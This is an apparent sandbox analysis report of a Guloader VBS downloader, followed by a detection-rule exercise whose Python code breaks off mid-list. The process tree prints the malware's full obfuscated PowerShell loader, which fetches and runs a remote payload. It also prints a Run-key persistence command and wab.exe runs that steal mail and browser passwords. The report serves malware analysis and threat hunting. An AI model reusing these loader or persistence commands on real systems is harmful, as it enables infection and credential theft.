Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    21-05-2024 14:59

General

  • Target

    5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66.vbs

  • Size

    13KB

  • MD5

    12e0264eaf14daca0cd45da32ea68c80

  • SHA1

    56774e10d374a80549d06406f52514c06634c5e4

  • SHA256

    5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66

  • SHA512

    8d80725c889c722be19dd07bda6c8ed29d2a2d5cd8f353eb5df7f4f998538c7ca8afd08993800c7cdb2772f6b5c51e78399c51e486c19fafa29f963acdc6b66e

  • SSDEEP

    192:6i9I38fdqWxBTsQqkqYK2yud66mT7LdjnPm4oTgWXvA/YJgzyv3tEQpK:1I3IddsMqYK2ndc1jO4cgZ/+GyPtLK

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode-based downloader first seen in 2020.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2528
    • C:\Windows\System32\cmd.exe
      cmd.exe /c ping 6777.6777.6777.677e
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2276
      • C:\Windows\system32\PING.EXE
        ping 6777.6777.6777.677e
        3⤵
        • Runs ping.exe
        PID:2348
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dokumentationsniveaus = 1;$Hjemegn='Sub';$Hjemegn+='strin';$Hjemegn+='g';Function Pugmiller27($Afficerer){$Fjaserierne=$Afficerer.Length-$Dokumentationsniveaus;For($Semimythically=7;$Semimythically -lt $Fjaserierne;$Semimythically+=8){$Formidabel+=$Afficerer.$Hjemegn.Invoke( $Semimythically, $Dokumentationsniveaus);}$Formidabel;}function Skuffemblers80($Nundination){& ($Fiberizes) ($Nundination);}$Riches=Pugmiller27 'Unfea iMGert,udote.zinazidemndeiSkulderlKejserelKullereaM,squaw/ ranule5Uv.denh.Indsigt0 Teapoy Apsisex(ForsamlWVermicuiNrbanekn Opkal,d SkoleeoD.pnoouwDe.icatsBrushwo PreintoNBnkeradTSurdent Unceles1Tyndta.0Sco,ogg. Drm ea0Interwr; Papegj U.kikkeWPresse iBaggingnPhenopl6Moskgae4Rystnin;Cor.ado EnteroxProgram6Fleligt4Sco nin; Minesw Trif.crU,ikresvIffritt:Gigoloe1 fdestu2Dreamer1Skridso. Stoppe0 rg jle)Diatom. Biog.apGDrivbnkeDietalacTonkawakParenteoAdditum/Anjo mo2A.rmong0Bayrern1hypotak0befordr0Sabb,ti1Eksamen0Teltsla1Seksten UdvideFattraktiChol.dorDrawcaneStrmperfIffcoluoT dstavxAmphict/Coe.uca1Geologi2Discipl1App,rte. 
Job,gn0D.hydro ';$hermae=Pugmiller27 'CivilisUBefohsfsBjergtoeBe,onkorforlyst-DykkedeAForflytgVicedireKassatin vsprintFllesud ';$Klippespalternes=Pugmiller27 'Recoillh StringtPist rstMercer pUninfri:Fright./tel mec/BrabblimWrannyfa LinenidPogoniaiOver apbBeraabea,lirtatrAn.iqueoMellemrhNonfluii.mpalealPejlevoaTermin lArithmoa Cari.ot BellahwTidssero Harpoo.VanddradPennefjuIsocy ncPaakldek Moorhed Selvbyn.sentrosMessing.Sele,ogomarkedsr Arti egKuldslo/L,vetraaOverspelMa,nedsl Fo,bru/ChristeOreassumvForgr beTikroner ethavepFoilingrBilophuoHar isttPrivataeUnkindlcDieucontTetraheeVilipendAuto.at.BrtternaPaduanisHurtigvdKnownsb>grundprhUnsu,pltReaffiltFreewompDren hesPamphar: Optje./ Kendin/Rigsar.csolilo a HelgesdFranckceLatinamnMundgodaOvercledcutleriePi,dymcr Forstre Vandfog Allitea.mhyggelHen,ikkoDiatonisGunsh t.IsagogicHortikuoKorskirm Fortri/HelmintO SamlinvIsoc ateForbo.sr kursusp Alc horDi,konioParopsitBrokkaseRegrassc KlebrntVaccinaeAchigandDmninge. DiskanaBal,erdsDampededMisc nc ';$Indeksnavnenes=Pugmiller27 'Horeu,g> Neckb. 
';$Fiberizes=Pugmiller27 ' AsperiiUnderlaeUdslusax.ialogu ';$unfashionably='Underste';$Ndringsloven = Pugmiller27 'VernacueAntistrcFornufthKu.isshoEstabli Unlamen%YvindasaAfstr.spEvaporapFirspand K shmia CircumtStalagmaSolvarm%trichin\T gthusDFestdagrOuttopiothackerh Dronis.G.ggereL Bem.leiKonsul tDisbury Mimusop&unjo tl& Unrefr ExclusieP,ovedicPa aesthPholioto Boroca NonmanutHousebo ';Skuffemblers80 (Pugmiller27 ' Brevve$Sibyllig E.keltlasylth,oBo.genebAphanesaNonm.rrlstedfas: sermonRHjemvisaErgotizaTyp,husgPastelfeBrightnr BravoenSold teeOwl ike=unplaya(Overcolc mbitiomPaternid,ersali Idealit/ Sprackc tekedy Westli$System.NPhotomud registrDetermiiPistrixnTr.thsmgTomensvsThu.nidltilkendoSkarnbtvStyrekae.andelsn.ongres)R.ndvis ');Skuffemblers80 (Pugmiller27 'Gullery$BasilikgOntologll enabloMembranbCommulaaReprodulHjarnea:RuefulnI SaxaulnSkyd.spdBrugerdsDyrepareParkerinKbenhavs astodo=St dent$WummanaKU,etemallasterni.mutterpfam,etcpObjektke ApoteksS miwoopHolishkaPh tolalovergo,tFlberieeThirtyirMinisten,rydreheKn.vsmesNeder.e.AlarmsysChrist.pSt rgeolWhiteshiPr endetProsaen(Menings$K.lkulaIKvadratnIn.ectid AnteceeNonascekDigitissFortrngnPicturiaudbruddv SpulinnReguarde Positin Mowedee,pachets,acefor)Affodre ');$Klippespalternes=$Indsens[0];$Konstantnavn= (Pugmiller27 ',yrebes$Beboedeg A,rsoplObtestioLnniveab C ntriaHerm.lil Dr.van:K igsmaK Rec mpaDuksedrmBroekdee ,nderueFolk,krnApprokssWaiseja=OtogeniNSpi ekkeLangeelw T.angs-FlleskoOAlmachsb Raspedj SkittleKillybecKi,debatJordarv .dresseS i.deteyAgrologsJagterntSemiboue HissermSlu bet. 
SubfesNSubemareOmraadetSaliggr.UniseriWsh pyareOxytocib W stelCUneve,tlArkfdniiDaasellehave.usnreptilit');$Konstantnavn+=$Raagerne[1];Skuffemblers80 ($Konstantnavn);Skuffemblers80 (Pugmiller27 'Geother$W,odburKIntercaaSpytkirmMusicaleFormalieStoppegn,uperdesdiminut.snevejrHSammenseRewrit,a Nonundd Unskele Gtefolr brusqusSkattep[Desa in$C.rrupthOmbreudePlemoc,r Dobbelm DisomaaCalandeeIndif e]Saltant= Tri ul$Cons,raR krdderiSouthercPrognoshTe,moeleHalvakssMe.amor ');$Tripotassium=Pugmiller27 ' Pakist$NondecaKSpidsfiaComm.ndmEpriseteCorrespe MysticnTekstilsfkalieo.Beb,erdDUn,roroospan,shwWallisen JennielSelvbedoBrndvrdaInversedevadingFf stooniTrst.splGaulicwe.versig(grubers$Sad lecKM oledelH.lvstui krep,apGipsdeppJugglineGodken,sAngelinpScund ra SinterlRaffeeptOxamidie Gr.vkerBelaaninSugefiseIndrmmes Convey,Pupilla$ ,udekoUN.kedrmdUnabusilTilgodebBodenbesM.ddeltd Forjuda VasenbtAphrasioSprydsteUdsoninnVederhfsPloejer) Colpoh ';$Udlbsdatoens=$Raagerne[0];Skuffemblers80 (Pugmiller27 'Nabobye$UnsandagNonuncil OverdioKurs ikbtrianguaFore.oolBu dend:Aa.ningCLatou.saTempelrrI,ternayNonmen o Sp ntatFjernskiOleifernS,bstitsDiskva,=Preappe(ForvariTTomefuleExsectisChemophtEkvivok-PerduraP Samme aTranseqtF,rstrah Underg Detai l$SnkendeU Kal,kadP.oselylForktr,bc,nsumesHackersdcheckreaFaenometLovgi.no Zoo.eoeP etortnChaussfsantigra)Madrepo ');while (!$Caryotins) {Skuffemblers80 (Pugmiller27 'svineml$PirraurgBlas,rtlToldasso MarkrkbVariabeaCrassesl Udbeta:L.ppingEBeskuerkLu ningsSuba.paeBesty,emKunstkreWood,nltOmkldnis Fasci,=Bitters$.recooktSef kherBrandfouDgnmiddeFlels,s ') ;Skuffemblers80 $Tripotassium;Skuffemblers80 (Pugmiller27 'BugtedeSUnshaketGlanslsaHalberdrChaptalt.eposit- M chanSDyrtidslChyometeFimredeeEuorn,tp Ju,jub .frika4Optakts ');Skuffemblers80 (Pugmiller27 'Vandfor$TophuengLaconislDaysmeno GravhubGaintw,aHandbagl.igsadv:rrd.ummCStokerfaHeltenerLoranthyI.stalsoSammensttakstt.iRose.ben Unja ks P.ssma=Festrem(Bon efdTL,tfrdieFdevandsRv.ulletSkr ebl-UnassimP 
FormataYa.nerutauthorihBestemm Uninvag$InterpuUBathyspdudtrakdlHafterabElectros SeksaadStavlygaMilieu t ceneguoPrintm ePsykolonPred.spsAmorphi)Goldles ') ;Skuffemblers80 (Pugmiller27 'Lascivi$BlrenddgreusinglS,kterioHandlinb milliaa OmlgnilInterli:G eywarM.tdtrinaUdfrienrBullrags Briti h lomstmgatherfaMundat,nSemidom=Varnish$LeasinggScleroxlcompeteo ResaddbComplicaSpringbl Ko.sta:O.vejenBdisloadesto ebemImi ereospolet cObvia ikUnneedfeFunktiodCharc a+dehydre+Sovi ti%Immunes$BombardIAnge.linEhe,intdFolkboasBlousoneAnbefaln OptionsMisfie .l,kkericOrdtllioNattyfou atteagnLign ngtUigenne ') ;$Klippespalternes=$Indsens[$Marshman];}$Agonize=339107;$Simonies=30148;Skuffemblers80 (Pugmiller27 'Forlodc$T,rhildgRetrosplPolituro Undissb Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. 
Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3488
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"
        3⤵
          PID:4208
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dokumentationsniveaus = 1;$Hjemegn='Sub';$Hjemegn+='strin';$Hjemegn+='g';Function Pugmiller27($Afficerer){$Fjaserierne=$Afficerer.Length-$Dokumentationsniveaus;For($Semimythically=7;$Semimythically -lt $Fjaserierne;$Semimythically+=8){$Formidabel+=$Afficerer.$Hjemegn.Invoke( $Semimythically, $Dokumentationsniveaus);}$Formidabel;}function Skuffemblers80($Nundination){& ($Fiberizes) ($Nundination);}$Riches=Pugmiller27 'Unfea iMGert,udote.zinazidemndeiSkulderlKejserelKullereaM,squaw/ ranule5Uv.denh.Indsigt0 Teapoy Apsisex(ForsamlWVermicuiNrbanekn Opkal,d SkoleeoD.pnoouwDe.icatsBrushwo PreintoNBnkeradTSurdent Unceles1Tyndta.0Sco,ogg. Drm ea0Interwr; Papegj U.kikkeWPresse iBaggingnPhenopl6Moskgae4Rystnin;Cor.ado EnteroxProgram6Fleligt4Sco nin; Minesw Trif.crU,ikresvIffritt:Gigoloe1 fdestu2Dreamer1Skridso. Stoppe0 rg jle)Diatom. Biog.apGDrivbnkeDietalacTonkawakParenteoAdditum/Anjo mo2A.rmong0Bayrern1hypotak0befordr0Sabb,ti1Eksamen0Teltsla1Seksten UdvideFattraktiChol.dorDrawcaneStrmperfIffcoluoT dstavxAmphict/Coe.uca1Geologi2Discipl1App,rte. 
Job,gn0D.hydro ';$hermae=Pugmiller27 'CivilisUBefohsfsBjergtoeBe,onkorforlyst-DykkedeAForflytgVicedireKassatin vsprintFllesud ';$Klippespalternes=Pugmiller27 'Recoillh StringtPist rstMercer pUninfri:Fright./tel mec/BrabblimWrannyfa LinenidPogoniaiOver apbBeraabea,lirtatrAn.iqueoMellemrhNonfluii.mpalealPejlevoaTermin lArithmoa Cari.ot BellahwTidssero Harpoo.VanddradPennefjuIsocy ncPaakldek Moorhed Selvbyn.sentrosMessing.Sele,ogomarkedsr Arti egKuldslo/L,vetraaOverspelMa,nedsl Fo,bru/ChristeOreassumvForgr beTikroner ethavepFoilingrBilophuoHar isttPrivataeUnkindlcDieucontTetraheeVilipendAuto.at.BrtternaPaduanisHurtigvdKnownsb>grundprhUnsu,pltReaffiltFreewompDren hesPamphar: Optje./ Kendin/Rigsar.csolilo a HelgesdFranckceLatinamnMundgodaOvercledcutleriePi,dymcr Forstre Vandfog Allitea.mhyggelHen,ikkoDiatonisGunsh t.IsagogicHortikuoKorskirm Fortri/HelmintO SamlinvIsoc ateForbo.sr kursusp Alc horDi,konioParopsitBrokkaseRegrassc KlebrntVaccinaeAchigandDmninge. DiskanaBal,erdsDampededMisc nc ';$Indeksnavnenes=Pugmiller27 'Horeu,g> Neckb. 
';$Fiberizes=Pugmiller27 ' AsperiiUnderlaeUdslusax.ialogu ';$unfashionably='Underste';$Ndringsloven = Pugmiller27 'VernacueAntistrcFornufthKu.isshoEstabli Unlamen%YvindasaAfstr.spEvaporapFirspand K shmia CircumtStalagmaSolvarm%trichin\T gthusDFestdagrOuttopiothackerh Dronis.G.ggereL Bem.leiKonsul tDisbury Mimusop&unjo tl& Unrefr ExclusieP,ovedicPa aesthPholioto Boroca NonmanutHousebo ';Skuffemblers80 (Pugmiller27 ' Brevve$Sibyllig E.keltlasylth,oBo.genebAphanesaNonm.rrlstedfas: sermonRHjemvisaErgotizaTyp,husgPastelfeBrightnr BravoenSold teeOwl ike=unplaya(Overcolc mbitiomPaternid,ersali Idealit/ Sprackc tekedy Westli$System.NPhotomud registrDetermiiPistrixnTr.thsmgTomensvsThu.nidltilkendoSkarnbtvStyrekae.andelsn.ongres)R.ndvis ');Skuffemblers80 (Pugmiller27 'Gullery$BasilikgOntologll enabloMembranbCommulaaReprodulHjarnea:RuefulnI SaxaulnSkyd.spdBrugerdsDyrepareParkerinKbenhavs astodo=St dent$WummanaKU,etemallasterni.mutterpfam,etcpObjektke ApoteksS miwoopHolishkaPh tolalovergo,tFlberieeThirtyirMinisten,rydreheKn.vsmesNeder.e.AlarmsysChrist.pSt rgeolWhiteshiPr endetProsaen(Menings$K.lkulaIKvadratnIn.ectid AnteceeNonascekDigitissFortrngnPicturiaudbruddv SpulinnReguarde Positin Mowedee,pachets,acefor)Affodre ');$Klippespalternes=$Indsens[0];$Konstantnavn= (Pugmiller27 ',yrebes$Beboedeg A,rsoplObtestioLnniveab C ntriaHerm.lil Dr.van:K igsmaK Rec mpaDuksedrmBroekdee ,nderueFolk,krnApprokssWaiseja=OtogeniNSpi ekkeLangeelw T.angs-FlleskoOAlmachsb Raspedj SkittleKillybecKi,debatJordarv .dresseS i.deteyAgrologsJagterntSemiboue HissermSlu bet. 
SubfesNSubemareOmraadetSaliggr.UniseriWsh pyareOxytocib W stelCUneve,tlArkfdniiDaasellehave.usnreptilit');$Konstantnavn+=$Raagerne[1];Skuffemblers80 ($Konstantnavn);Skuffemblers80 (Pugmiller27 'Geother$W,odburKIntercaaSpytkirmMusicaleFormalieStoppegn,uperdesdiminut.snevejrHSammenseRewrit,a Nonundd Unskele Gtefolr brusqusSkattep[Desa in$C.rrupthOmbreudePlemoc,r Dobbelm DisomaaCalandeeIndif e]Saltant= Tri ul$Cons,raR krdderiSouthercPrognoshTe,moeleHalvakssMe.amor ');$Tripotassium=Pugmiller27 ' Pakist$NondecaKSpidsfiaComm.ndmEpriseteCorrespe MysticnTekstilsfkalieo.Beb,erdDUn,roroospan,shwWallisen JennielSelvbedoBrndvrdaInversedevadingFf stooniTrst.splGaulicwe.versig(grubers$Sad lecKM oledelH.lvstui krep,apGipsdeppJugglineGodken,sAngelinpScund ra SinterlRaffeeptOxamidie Gr.vkerBelaaninSugefiseIndrmmes Convey,Pupilla$ ,udekoUN.kedrmdUnabusilTilgodebBodenbesM.ddeltd Forjuda VasenbtAphrasioSprydsteUdsoninnVederhfsPloejer) Colpoh ';$Udlbsdatoens=$Raagerne[0];Skuffemblers80 (Pugmiller27 'Nabobye$UnsandagNonuncil OverdioKurs ikbtrianguaFore.oolBu dend:Aa.ningCLatou.saTempelrrI,ternayNonmen o Sp ntatFjernskiOleifernS,bstitsDiskva,=Preappe(ForvariTTomefuleExsectisChemophtEkvivok-PerduraP Samme aTranseqtF,rstrah Underg Detai l$SnkendeU Kal,kadP.oselylForktr,bc,nsumesHackersdcheckreaFaenometLovgi.no Zoo.eoeP etortnChaussfsantigra)Madrepo ');while (!$Caryotins) {Skuffemblers80 (Pugmiller27 'svineml$PirraurgBlas,rtlToldasso MarkrkbVariabeaCrassesl Udbeta:L.ppingEBeskuerkLu ningsSuba.paeBesty,emKunstkreWood,nltOmkldnis Fasci,=Bitters$.recooktSef kherBrandfouDgnmiddeFlels,s ') ;Skuffemblers80 $Tripotassium;Skuffemblers80 (Pugmiller27 'BugtedeSUnshaketGlanslsaHalberdrChaptalt.eposit- M chanSDyrtidslChyometeFimredeeEuorn,tp Ju,jub .frika4Optakts ');Skuffemblers80 (Pugmiller27 'Vandfor$TophuengLaconislDaysmeno GravhubGaintw,aHandbagl.igsadv:rrd.ummCStokerfaHeltenerLoranthyI.stalsoSammensttakstt.iRose.ben Unja ks P.ssma=Festrem(Bon efdTL,tfrdieFdevandsRv.ulletSkr ebl-UnassimP 
FormataYa.nerutauthorihBestemm Uninvag$InterpuUBathyspdudtrakdlHafterabElectros SeksaadStavlygaMilieu t ceneguoPrintm ePsykolonPred.spsAmorphi)Goldles ') ;Skuffemblers80 (Pugmiller27 'Lascivi$BlrenddgreusinglS,kterioHandlinb milliaa OmlgnilInterli:G eywarM.tdtrinaUdfrienrBullrags Briti h lomstmgatherfaMundat,nSemidom=Varnish$LeasinggScleroxlcompeteo ResaddbComplicaSpringbl Ko.sta:O.vejenBdisloadesto ebemImi ereospolet cObvia ikUnneedfeFunktiodCharc a+dehydre+Sovi ti%Immunes$BombardIAnge.linEhe,intdFolkboasBlousoneAnbefaln OptionsMisfie .l,kkericOrdtllioNattyfou atteagnLign ngtUigenne ') ;$Klippespalternes=$Indsens[$Marshman];}$Agonize=339107;$Simonies=30148;Skuffemblers80 (Pugmiller27 'Forlodc$T,rhildgRetrosplPolituro Undissb Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. 
Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3300
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"
            4⤵
              PID:4428
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:3044
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1624
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1412
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nobtnhuqqxsvaxybxuzgbthktkatecctdk"
                5⤵
                  PID:5072
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nobtnhuqqxsvaxybxuzgbthktkatecctdk"
                  5⤵
                    PID:856
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nobtnhuqqxsvaxybxuzgbthktkatecctdk"
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2764
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\pqoeos"
                    5⤵
                    • Accesses Microsoft Outlook accounts
                    PID:4532
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zltxokpmsn"
                    5⤵
                      PID:4508
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zltxokpmsn"
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3692

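Read as a detection exercise, the tree above offers five pivots a hunter can turn into rules: a script host (WScript.exe) handing off to powershell.exe; a 64-bit powershell.exe launching its SysWOW64 counterpart; powershell.exe launching wab.exe (Windows Contacts), which together with the SetThreadContext and MapViewOfSection flags on PID 3044 marks the legitimate binary as an injection host; wab.exe instances run with /stext, the NirSoft save-to-text switch behind the MailPassView and WebBrowserPassView signatures; and reg.exe writing a REG_EXPAND_SZ Run value whose command hides behind an environment variable (%Peritenon%) and is read back from HKCU:\Sojaskraaets at logon. One caveat: the report never shows %Peritenon% being set, so whether that Run entry actually fires on the next logon cannot be confirmed from this page. The Python below is an added example for this page, not tooling from the sandbox; the event list is constructed from the PIDs, parents, images and command lines shown above (the two obfuscated PowerShell command lines are elided), and the rule names are mine.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str

WAB = r"C:\Program Files (x86)\windows mail\wab.exe"
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
TMP = r"C:\Users\Admin\AppData\Local\Temp"
REG_ADD = r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"'''

# Constructed from the process tree in this report (PID, parent PID, image,
# command line). Not a sandbox export; the PowerShell command lines are elided.
EVENTS = [
    Proc(2528, 0,    r"C:\Windows\System32\WScript.exe", rf'"C:\Windows\System32\WScript.exe" "{TMP}\5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66.vbs"'),
    Proc(2276, 2528, r"C:\Windows\System32\cmd.exe", "cmd.exe /c ping 6777.6777.6777.677e"),
    Proc(2348, 2276, r"C:\Windows\system32\PING.EXE", "ping 6777.6777.6777.677e"),
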